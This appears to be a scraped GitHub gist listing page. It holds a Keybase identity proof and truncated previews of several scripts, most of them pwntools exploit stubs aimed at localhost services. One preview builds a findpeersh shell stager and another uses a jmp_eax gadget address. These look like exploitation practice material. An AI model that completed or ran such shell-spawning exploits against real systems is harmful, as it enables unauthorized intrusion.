I hereby claim:
- I am robertlarsen on github.
- I am robertlarsen (https://keybase.io/robertlarsen) on keybase.
- I have a public key whose fingerprint is 14BE F756 4092 1FC9 C8E6 1806 CC33 1E8A C16A 1996
To claim this, I am signing this object:
| #!/usr/bin/env python2 | |
| import base64, struct, sys | |
| if len(sys.argv) > 1: | |
| try: | |
| binary = base64.decodestring(sys.argv[1]) | |
| #File header | |
| sys.stdout.write(struct.pack("IHHIIII", | |
| 0xa1b2c3d4, # Magic |
I hereby claim:
To claim this, I am signing this object:
| #!/usr/bin/env python2 | |
| from pwn import * | |
| from time import sleep | |
| context(arch = 'amd64', os = 'linux') | |
| r = remote('localhost', 8888) | |
| payload = asm(shellcraft.findpeersh()) | |
| stager = asm(shellcraft.findpeer() + shellcraft.stager('rdi', len(payload))) |
| #include <fcntl.h> | |
| #include <netinet/in.h> | |
| #include <signal.h> | |
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <sys/socket.h> | |
| #include <sys/stat.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> |
| #!/usr/bin/python | |
| from pwn import * | |
| import sys | |
| context(os='linux', arch='i386') | |
| jmp_eax=0x08048bf7 | |
| host = 'localhost' | |
| port = 9988 |
| #!/usr/bin/python | |
| from pwn import * | |
| import sys | |
| context(os='linux', arch='i386') | |
| host = 'localhost' | |
| port = 9988 | |
| if len(sys.argv) > 1: |